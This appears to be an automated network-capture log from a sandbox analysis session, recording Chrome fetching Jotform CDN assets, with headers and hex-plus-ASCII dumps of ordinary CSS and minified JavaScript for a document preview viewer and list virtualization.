                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 6f 6e 65 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 32 35 25 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 6c 65 66 74 3a 30 7d 2e 6a 50 72 65 76 69 65 77 2d 64 6f 63 75 6d 65 6e 74 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 72 67 62 61 28 30 2c 30 2c 30 2c 2e 37 29 20 2d 34 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 20 33 30 25 2c 74 72 61 6e 73 70 61 72 65 6e 74 20 39 31 25 29 3b 74 6f 70 3a 30 7d 2e 6a 50 72 65 76 69 65 77 2d 64 6f 63 75 6d 65 6e 74 3a 61 66 74 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 72 61 6e 73 70 61 72 65 6e 74 20 39 25 2c 72 67 62 61 28
                                                                                                                                                                                                                                            Data Ascii: one;pointer-events:none;width:100%;height:25%;position:fixed;left:0}.jPreview-document:before{background:linear-gradient(rgba(0,0,0,.7) -40%,rgba(0,0,0,.2) 30%,transparent 91%);top:0}.jPreview-document:after{background:linear-gradient(transparent 9%,rgba(
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 33 30 70 78 7d 2e 6a 50 72 65 76 69 65 77 2d 64 6f 63 75 6d 65 6e 74 2e 73 69 6e 67 6c 65 46 69 6c 65 2e 70 72 65 76 69 65 77 50 44 46 20 2e 72 65 61 63 74 2d 70 64 66 5f 5f 50 61 67 65 5f 5f 61 6e 6e 6f 74 61 74 69 6f 6e 73 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 6a 50 72 65 76 69 65 77 2d 66 6f 6f 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 32 30 70 78 29 3b 68 65 69 67 68 74 3a 38 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 6c 65 66 74 3a 31 30 70 78 7d 2e 6a 50 72 65 76 69 65 77 2d 66 6f 6f 74 65 72 43 6f 6e 74 61 69 6e 65 72 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72
                                                                                                                                                                                                                                            Data Ascii: ;margin-top:130px}.jPreview-document.singleFile.previewPDF .react-pdf__Page__annotations{display:none}.jPreview-footer{text-align:center;width:calc(100% - 20px);height:80px;position:absolute;bottom:10px;left:10px}.jPreview-footerContainer{white-space:nowr
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 3a 70 6f 69 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 7d 2e 6a 50 72 65 76 69 65 77 2d 7a 6f 6f 6d 43 6f 6e 74 61 69 6e 65 72 20 2e 7a 6f 6f 6d 4f 75 74 20 73 76 67 2c 2e 6a 50 72 65 76 69 65 77 2d 7a 6f 6f 6d 43 6f 6e 74 61 69 6e 65 72 20 2e 7a 6f 6f 6d 49 6e 20 73 76 67 7b 77 69 64 74 68 3a 32 30 70 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63
                                                                                                                                                                                                                                            Data Ascii: :pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;color:#fff;background-color:transparent;border:none;padding:10px}.jPreview-zoomContainer .zoomOut svg,.jPreview-zoomContainer .zoomIn svg{width:20px;display:bloc
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 73 76 67 7b 77 69 64 74 68 3a 34 38 70 78 7d 2e 4a 6f 74 66 6f 72 6d 53 68 65 65 74 73 20 2e 6a 50 72 65 76 69 65 77 20 2e 6a 53 68 65 65 74 43 6f 6e 74 65 78 74 4d 65 6e 75 7b 72 69 67 68 74 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 33 36 70 78 29 7d 2e 6a 50 72 65 76 69 65 77 20 2e 6a 53 68 65 65 74 43 6f 6e 74 65 78 74 4d 65 6e 75 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 38 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 63 61 6c 63 28 31 30 30 25 20 2b 20 37 70 78 29 3b 72 69 67 68 74 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 33 36 70 78 29 7d 2e 6a 50 72 65 76 69 65 77 20 2e 6a 53 68 65 65 74 43 6f 6e 74 65 78 74 4d 65 6e 75 20 2e 63 6f 6e 74 65 78 74 4d 65 6e 75 2d 69 74 65 6d
                                                                                                                                                                                                                                            Data Ascii: svg{width:48px}.JotformSheets .jPreview .jSheetContextMenu{right:calc(100% - 36px)}.jPreview .jSheetContextMenu{border-radius:4px;min-width:208px;position:absolute;top:calc(100% + 7px);right:calc(100% - 36px)}.jPreview .jSheetContextMenu .contextMenu-item
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC374INData Raw: 74 3a 31 32 70 78 7d 2e 6a 50 72 65 76 69 65 77 2d 70 72 65 76 7b 6c 65 66 74 3a 31 32 70 78 7d 2e 70 72 65 76 69 65 77 2d 63 6f 6e 74 72 6f 6c 73 2e 6a 50 72 65 76 69 65 77 2d 70 72 65 76 20 73 76 67 2c 2e 70 72 65 76 69 65 77 2d 63 6f 6e 74 72 6f 6c 73 2e 6a 50 72 65 76 69 65 77 2d 6e 65 78 74 20 73 76 67 7b 63 6f 6c 6f 72 3a 23 33 34 33 63 36 61 3b 77 69 64 74 68 3a 32 30 70 78 7d 2e 6a 50 72 65 76 69 65 77 2d 66 69 6c 65 49 6e 66 6f 7b 6d 61 78 2d 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 39 35 70 78 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 61 70 70 65 61 72 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 74 6f 42 6f 74 74 6f 6d 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a
                                                                                                                                                                                                                                            Data Ascii: t:12px}.jPreview-prev{left:12px}.preview-controls.jPreview-prev svg,.preview-controls.jPreview-next svg{color:#343c6a;width:20px}.jPreview-fileInfo{max-width:calc(100% - 95px)}}@keyframes appear{0%{opacity:0}to{opacity:1}}@keyframes toBottom{0%{transform:


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            94192.168.2.1749808104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC560OUTGET /s/portal/674ac14411e/static/js/5083.cbf741f8.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC426INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:20 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 10892
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:26:55 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "ef7d0daf7c7d4a4debbc94603be8497a"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb64ececa7cee-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC943INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 32 66 30 39 36 39 66 66 2d 30 62 30 34 2d 35 31 30 61 2d 38 61 65 33 2d 36 36 38 37 65 62
                                                                                                                                                                                                                                            Data Ascii: "use strict";!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="2f0969ff-0b04-510a-8ae3-6687eb
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 6e 6f 77 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 44 61 74 65 2e 6e 6f 77 28 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 75 28 74 29 7b 63 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 74 2e 69 64 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 2c 65 29 7b 76 61 72 20 72 3d 63 28 29 3b 76 61 72 20 6e 3d 7b 69 64 3a 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 28 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 63 28 29 2d 72 3e 3d 65 3f 74 2e 63 61 6c 6c 28 6e 75 6c 6c 29 3a 6e 2e 69 64 3d 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 6f 29 7d 29 29 7d 3b 72 65 74 75 72 6e 20 6e 7d 76 61 72 20 64 3d
                                                                                                                                                                                                                                            Data Ascii: now?function(){return performance.now()}:function(){return Date.now()};function u(t){cancelAnimationFrame(t.id)}function f(t,e){var r=c();var n={id:requestAnimationFrame((function o(){c()-r>=e?t.call(null):n.id=requestAnimationFrame(o)}))};return n}var d=
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 6d 73 52 65 6e 64 65 72 65 64 3d 76 6f 69 64 20 30 2c 72 2e 5f 63 61 6c 6c 4f 6e 49 74 65 6d 73 52 65 6e 64 65 72 65 64 3d 6c 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 72 2e 70 72 6f 70 73 2e 6f 6e 49 74 65 6d 73 52 65 6e 64 65 72 65 64 28 7b 6f 76 65 72 73 63 61 6e 53 74 61 72 74 49 6e 64 65 78 3a 74 2c 6f 76 65 72 73 63 61 6e 53 74 6f 70 49 6e 64 65 78 3a 65 2c 76 69 73 69 62 6c 65 53 74 61 72 74 49 6e 64 65 78 3a 6e 2c 76 69 73 69 62 6c 65 53 74 6f 70 49 6e 64 65 78 3a 6f 7d 29 7d 29 29 2c 72 2e 5f 63 61 6c 6c 4f 6e 53 63 72 6f 6c 6c 3d 76 6f 69 64 20 30 2c 72 2e 5f 63 61 6c 6c 4f 6e 53 63 72 6f 6c 6c 3d 6c 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 70 72 6f 70 73 2e 6f 6e 53
                                                                                                                                                                                                                                            Data Ascii: msRendered=void 0,r._callOnItemsRendered=l((function(t,e,n,o){return r.props.onItemsRendered({overscanStartIndex:t,overscanStopIndex:e,visibleStartIndex:n,visibleStopIndex:o})})),r._callOnScroll=void 0,r._callOnScroll=l((function(t,e,n){return r.props.onS
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 69 3d 65 2e 73 63 72 6f 6c 6c 54 6f 70 3b 72 2e 73 65 74 53 74 61 74 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 2e 73 63 72 6f 6c 6c 4f 66 66 73 65 74 3d 3d 3d 69 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 65 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 69 2c 6f 2d 6e 29 29 3b 72 65 74 75 72 6e 7b 69 73 53 63 72 6f 6c 6c 69 6e 67 3a 21 30 2c 73 63 72 6f 6c 6c 44 69 72 65 63 74 69 6f 6e 3a 74 2e 73 63 72 6f 6c 6c 4f 66 66 73 65 74 3c 65 3f 22 66 6f 72 77 61 72 64 22 3a 22 62 61 63 6b 77 61 72 64 22 2c 73 63 72 6f 6c 6c 4f 66 66 73 65 74 3a 65 2c 73 63 72 6f 6c 6c 55 70 64 61 74 65 57 61 73 52 65 71 75 65 73 74 65 64 3a 21 31 7d 7d 29 2c 72 2e 5f 72 65 73 65 74 49 73 53 63 72 6f 6c 6c 69 6e 67 44 65 62 6f 75 6e 63 65
                                                                                                                                                                                                                                            Data Ascii: i=e.scrollTop;r.setState((function(t){if(t.scrollOffset===i)return null;var e=Math.max(0,Math.min(i,o-n));return{isScrolling:!0,scrollDirection:t.scrollOffset<e?"forward":"backward",scrollOffset:e,scrollUpdateWasRequested:!1}}),r._resetIsScrollingDebounce
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 74 79 70 65 6f 66 20 72 26 26 6e 75 6c 6c 21 3d 74 68 69 73 2e 5f 6f 75 74 65 72 52 65 66 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 5f 6f 75 74 65 72 52 65 66 3b 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 65 7c 7c 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 6e 3f 6f 2e 73 63 72 6f 6c 6c 4c 65 66 74 3d 72 3a 6f 2e 73 63 72 6f 6c 6c 54 6f 70 3d 72 7d 74 68 69 73 2e 5f 63 61 6c 6c 50 72 6f 70 73 43 61 6c 6c 62 61 63 6b 73 28 29 7d 2c 72 2e 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 55 70 64 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 70 72 6f 70 73 2c 65 3d 74 2e 64 69 72 65 63 74 69 6f 6e 2c 72 3d 74 2e 6c 61 79 6f 75 74 2c 6e 3d 74 68 69 73 2e 73 74 61 74 65 2c 6f 3d 6e 2e 73 63 72 6f 6c 6c 4f 66 66 73 65 74 3b 69 66 28 6e 2e 73
                                                                                                                                                                                                                                            Data Ascii: typeof r&&null!=this._outerRef){var o=this._outerRef;"horizontal"===e||"horizontal"===n?o.scrollLeft=r:o.scrollTop=r}this._callPropsCallbacks()},r.componentDidUpdate=function(){var t=this.props,e=t.direction,r=t.layout,n=this.state,o=n.scrollOffset;if(n.s
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 7b 63 6c 61 73 73 4e 61 6d 65 3a 72 2c 6f 6e 53 63 72 6f 6c 6c 3a 78 2c 72 65 66 3a 74 68 69 73 2e 5f 6f 75 74 65 72 52 65 66 53 65 74 74 65 72 2c 73 74 79 6c 65 3a 28 30 2c 6e 2e 5a 29 28 7b 70 6f 73 69 74 69 6f 6e 3a 22 72 65 6c 61 74 69 76 65 22 2c 68 65 69 67 68 74 3a 69 2c 77 69 64 74 68 3a 4d 2c 6f 76 65 72 66 6c 6f 77 3a 22 61 75 74 6f 22 2c 57 65 62 6b 69 74 4f 76 65 72 66 6c 6f 77 53 63 72 6f 6c 6c 69 6e 67 3a 22 74 6f 75 63 68 22 2c 77 69 6c 6c 43 68 61 6e 67 65 3a 22 74 72 61 6e 73 66 6f 72 6d 22 2c 64 69 72 65 63 74 69 6f 6e 3a 6f 7d 2c 49 29 7d 2c 28 30 2c 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 29 28 6c 7c 7c 75 7c 7c 22 64 69 76 22 2c 7b 63 68 69 6c 64 72 65 6e 3a 52 2c 72 65 66 3a 61 2c 73 74 79 6c 65 3a 7b 68 65 69 67 68 74 3a 7a 3f
                                                                                                                                                                                                                                            Data Ascii: {className:r,onScroll:x,ref:this._outerRefSetter,style:(0,n.Z)({position:"relative",height:i,width:M,overflow:"auto",WebkitOverflowScrolling:"touch",willChange:"transform",direction:o},I)},(0,s.createElement)(l||u||"div",{children:R,ref:a,style:{height:z?
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 3e 69 29 7b 76 61 72 20 61 3d 30 3b 69 66 28 69 3e 3d 30 29 7b 76 61 72 20 6c 3d 6f 5b 69 5d 3b 61 3d 6c 2e 6f 66 66 73 65 74 2b 6c 2e 73 69 7a 65 7d 66 6f 72 28 76 61 72 20 73 3d 69 2b 31 3b 73 3c 3d 65 3b 73 2b 2b 29 7b 76 61 72 20 63 3d 6e 28 73 29 3b 6f 5b 73 5d 3d 7b 6f 66 66 73 65 74 3a 61 2c 73 69 7a 65 3a 63 7d 2c 61 2b 3d 63 7d 72 2e 6c 61 73 74 4d 65 61 73 75 72 65 64 49 6e 64 65 78 3d 65 7d 72 65 74 75 72 6e 20 6f 5b 65 5d 7d 2c 53 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 2c 6e 2c 6f 29 7b 66 6f 72 28 3b 6e 3c 3d 72 3b 29 7b 76 61 72 20 69 3d 6e 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 6e 29 2f 32 29 2c 61 3d 67 28 74 2c 69 2c 65 29 2e 6f 66 66 73 65 74 3b 69 66 28 61 3d 3d 3d 6f 29 72 65 74 75 72 6e 20 69 3b 61 3c 6f 3f 6e 3d 69 2b 31
                                                                                                                                                                                                                                            Data Ascii: >i){var a=0;if(i>=0){var l=o[i];a=l.offset+l.size}for(var s=i+1;s<=e;s++){var c=n(s);o[s]={offset:a,size:c},a+=c}r.lastMeasuredIndex=e}return o[e]},S=function(t,e,r,n,o){for(;n<=r;){var i=n+Math.floor((r-n)/2),a=g(t,i,e).offset;if(a===o)return i;a<o?n=i+1
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 66 6f 72 28 76 61 72 20 6f 3d 74 2e 64 69 72 65 63 74 69 6f 6e 2c 69 3d 74 2e 68 65 69 67 68 74 2c 61 3d 74 2e 69 74 65 6d 43 6f 75 6e 74 2c 6c 3d 74 2e 6c 61 79 6f 75 74 2c 73 3d 74 2e 77 69 64 74 68 2c 63 3d 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 6f 7c 7c 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 6c 3f 73 3a 69 2c 75 3d 67 28 74 2c 65 2c 6e 29 2c 66 3d 72 2b 63 2c 64 3d 75 2e 6f 66 66 73 65 74 2b 75 2e 73 69 7a 65 2c 68 3d 65 3b 68 3c 61 2d 31 26 26 64 3c 66 3b 29 68 2b 2b 2c 64 2b 3d 67 28 74 2c 68 2c 6e 29 2e 73 69 7a 65 3b 72 65 74 75 72 6e 20 68 7d 2c 69 6e 69 74 49 6e 73 74 61 6e 63 65 50 72 6f 70 73 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 7b 69 74 65 6d 4d 65 74 61 64 61 74 61 4d 61 70 3a 7b 7d 2c 65 73 74 69 6d 61
                                                                                                                                                                                                                                            Data Ascii: for(var o=t.direction,i=t.height,a=t.itemCount,l=t.layout,s=t.width,c="horizontal"===o||"horizontal"===l?s:i,u=g(t,e,n),f=r+c,d=u.offset+u.size,h=e;h<a-1&&d<f;)h++,d+=g(t,h,n).size;return h},initInstanceProps:function(t,e){var r={itemMetadataMap:{},estima
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC366INData Raw: 3d 74 2e 69 74 65 6d 43 6f 75 6e 74 2c 61 3d 74 2e 69 74 65 6d 53 69 7a 65 2c 6c 3d 74 2e 6c 61 79 6f 75 74 2c 73 3d 74 2e 77 69 64 74 68 2c 63 3d 65 2a 61 2c 75 3d 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 6e 7c 7c 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 6c 3f 73 3a 6f 2c 66 3d 4d 61 74 68 2e 63 65 69 6c 28 28 75 2b 72 2d 63 29 2f 61 29 3b 72 65 74 75 72 6e 20 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 69 2d 31 2c 65 2b 66 2d 31 29 29 7d 2c 69 6e 69 74 49 6e 73 74 61 6e 63 65 50 72 6f 70 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 7d 2c 73 68 6f 75 6c 64 52 65 73 65 74 53 74 79 6c 65 43 61 63 68 65 4f 6e 49 74 65 6d 53 69 7a 65 43 68 61 6e 67 65 3a 21 30 2c 76 61 6c 69 64 61 74 65 50 72 6f 70 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29
                                                                                                                                                                                                                                            Data Ascii: =t.itemCount,a=t.itemSize,l=t.layout,s=t.width,c=e*a,u="horizontal"===n||"horizontal"===l?s:o,f=Math.ceil((u+r-c)/a);return Math.max(0,Math.min(i-1,e+f-1))},initInstanceProps:function(t){},shouldResetStyleCacheOnItemSizeChange:!0,validateProps:function(t)


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            95192.168.2.1749809104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC560OUTGET /s/portal/674ac14411e/static/js/5241.1f05701c.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC427INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:20 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 624979
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:26:55 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "7bf05f15e88ca1a7a9d1060e2feed54f"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb64ec91618f2-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC942INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 35 32 34 31 2e 31 66 30 35 37 30 31 63 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64
                                                                                                                                                                                                                                            Data Ascii: /*! For license information please see 5241.1f05701c.js.LICENSE.txt */!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugId
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 6d 32 34 3d 63 2c 74 2e 6d 33 34 3d 76 2c 74 2e 6d 34 34 3d 62 7d 65 6c 73 65 7b 69 66 28 36 21 3d 3d 72 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 53 53 4d 61 74 72 69 78 3a 20 65 78 70 65 63 74 69 6e 67 20 61 6e 20 41 72 72 61 79 20 6f 66 20 36 2f 31 36 20 76 61 6c 75 65 73 2e 22 29 3b 76 61 72 20 5f 3d 72 5b 30 5d 2c 77 3d 72 5b 31 5d 2c 53 3d 72 5b 32 5d 2c 6b 3d 72 5b 33 5d 2c 41 3d 72 5b 34 5d 2c 78 3d 72 5b 35 5d 3b 74 2e 6d 31 31 3d 5f 2c 74 2e 61 3d 5f 2c 74 2e 6d 31 32 3d 77 2c 74 2e 62 3d 77 2c 74 2e 6d 32 31 3d 53 2c 74 2e 63 3d 53 2c 74 2e 6d 32 32 3d 6b 2c 74 2e 64 3d 6b 2c 74 2e 6d 34 31 3d 41 2c 74 2e 65 3d 41 2c 74 2e 6d 34 32 3d 78 2c 74 2e 66 3d 78 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63
